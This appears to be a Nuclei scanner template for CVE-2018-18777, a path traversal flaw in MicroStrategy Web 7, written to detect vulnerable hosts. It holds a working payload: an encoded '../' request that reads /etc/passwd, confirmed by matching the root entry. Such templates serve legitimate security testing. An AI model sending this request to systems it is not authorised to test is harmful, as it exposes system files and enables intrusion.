id: CVE-2018-18777 info: name: Path traversal vulnerability in Microstrategy Web version 7 author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/45755 tags: microstrategy,lfi requests: - method: GET path: - "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200